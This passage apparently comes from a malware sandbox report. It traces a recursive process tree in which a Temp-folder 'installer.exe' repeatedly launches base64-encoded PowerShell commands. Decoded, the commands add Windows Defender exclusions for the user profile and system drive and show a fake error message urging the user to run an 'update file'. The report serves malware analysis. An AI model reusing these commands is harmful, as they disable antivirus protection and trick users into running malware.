        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        83⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        83⤵
        
        PID:6168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        84⤵
        
        PID:7136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        84⤵
        
        PID:5600
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        84⤵
        
        PID:4164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        85⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        85⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        85⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        86⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        86⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        86⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        87⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        87⤵
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        87⤵
        
        PID:7024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        88⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        88⤵
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        88⤵
        
        PID:6192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        89⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        89⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        89⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        90⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        90⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        90⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        91⤵
        
        PID:4808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        91⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        91⤵
        
        PID:5524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        92⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        92⤵
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        92⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        93⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        93⤵
        
        PID:5792
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        93⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        94⤵
        System Location Discovery: System Language Discovery
        
        PID:6764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        94⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        94⤵
        System Location Discovery: System Language Discovery
        
        PID:6308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        95⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        95⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        95⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        96⤵
        
        PID:6168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        96⤵
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        96⤵
        
        PID:6272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        97⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        97⤵
        
        PID:6536
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        97⤵
        
        PID:4492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        98⤵
        
        PID:6772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        98⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        98⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
